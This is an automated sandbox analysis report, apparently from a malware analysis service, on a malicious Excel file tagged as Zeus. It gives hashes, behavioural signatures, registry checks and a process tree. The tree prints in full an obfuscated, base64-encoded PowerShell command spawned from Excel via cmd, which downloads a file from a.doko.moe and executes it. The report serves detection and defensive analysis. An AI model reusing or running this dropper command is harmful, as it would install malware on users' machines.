Analysis
-
max time kernel
134s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 17:34
Behavioral task
behavioral1
Sample
486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls
Resource
win10v2004-20241007-en
General
-
Target
486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls
-
Size
60KB
-
MD5
cb1b432c3c8341c03bd9c068e77b8483
-
SHA1
90e2fe9ae82c5643bd20729ee048088a38101fcb
-
SHA256
486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421
-
SHA512
a08218d7ec69c7b5657c9b4771b5dae36abbd753b8f3360adb6e0b05e1cd0f4ff4a3019690cbd5ac1dacb73137c8e507d0215ee0f0af5530a631b26f68a0ff6f
-
SSDEEP
1536:cDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAXyrrgZ2vGqJZHxMi4ZOyzpGwS:cDZ+RwPONXoRjDhIcp0fDlaGGx+cL26O
Malware Config
Extracted
https://a.doko.moe/aknxfz.jpg
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4408 848 cMD.exe 81 -
Zeus
-
Zeus family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 21 672 powershell.exe 25 672 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 848 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 672 powershell.exe 672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 672 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 848 EXCEL.EXE 848 EXCEL.EXE 848 EXCEL.EXE 848 EXCEL.EXE 848 EXCEL.EXE 848 EXCEL.EXE 848 EXCEL.EXE 848 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 848 wrote to memory of 4408 848 EXCEL.EXE 86 PID 848 wrote to memory of 4408 848 EXCEL.EXE 86 PID 4408 wrote to memory of 672 4408 cMD.exe 88 PID 4408 wrote to memory of 672 4408 cMD.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\486e3a18e708eec3e9f8d6b0e5adec6e3494be0b3813d3937881b6a626543421.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SYSTEM32\cMD.execMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAcwBIAHoANABMAFAAeABfAFMARwBiAEYANQBNAGUAQwBIACAAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQB7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHYAYgBoAGUAUQBJAGYAVwA0AGUAagAzAG0AcwBoAFUATQAgACkAOwAgAH0ADQAKAHQAcgB5AHsADQAKAA0ACgAkAGcANQB4AGQAaQBhAEIAaABUAFoAVgB1ADQAWABXADcAMgBqADkAeABYAGsATwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAQQA2ADYANQA1ADgAWQBBADEAXwA5AGsAbgA1AHgAYQBmAC4AZQB4AGUAJwA7AA0ACgBzAEgAegA0AEwAUAB4AF8AUwBHAGIARgA1AE0AZQBDAEgAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AYQBrAG4AeABmAHoALgBqAHAAZwAnACAAJABnADUAeABkAGkAYQBCAGgAVABaAFYAdQA0AFgAVwA3ADIAagA5AHgAWABrAE8AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAcwBIAHoANABMAFAAeABfAFMARwBiAEYANQBNAGUAQwBIACAAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQB7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAgACQAbABuADQARwB5AGwATwBfAGgAZwBOAHIARQBKAGkAMwB0AEQAdQA5AEEAeABuAEcAegBrAHoANwAzACAALAAgACQAdgBiAGgAZQBRAEkAZgBXADQAZQBqADMAbQBzAGgAVQBNACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHYAYgBoAGUAUQBJAGYAVwA0AGUAagAzAG0AcwBoAFUATQAgACkAOwAgAH0ADQAKAHQAcgB5AHsADQAKAA0ACgAkAGcANQB4AGQAaQBhAEIAaABUAFoAVgB1ADQAWABXADcAMgBqADkAeABYAGsATwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAQQA2ADYANQA1ADgAWQBBADEAXwA5AGsAbgA1AHgAYQBmAC4AZQB4AGUAJwA7AA0ACgBzAEgAegA0AEwAUAB4AF8AUwBHAGIARgA1AE0AZQBDAEgAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AYQBrAG4AeABmAHoALgBqAHAAZwAnACAAJABnADUAeABkAGkAYQBCAGgAVABaAFYAdQA0AFgAVwA3ADIAagA5AHgAWABrAE8AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5cf0e90fc630ff3e62a546f523321b7c7
SHA12b4808b1f535561fe5e044ad70bb4900d06dbc99
SHA256069f3369c839f65aa2b713287b01f8b569af50c90dbfe4ad14e5bb7c8b901b77
SHA512630d58b7e86da37a3e48af44e1aa1d580cff6d7ccc7969e1021b98a42a5ccbaa920e830e969bd70380c683d6f150bcc6ee9c604454205c38322db9b4d5412de0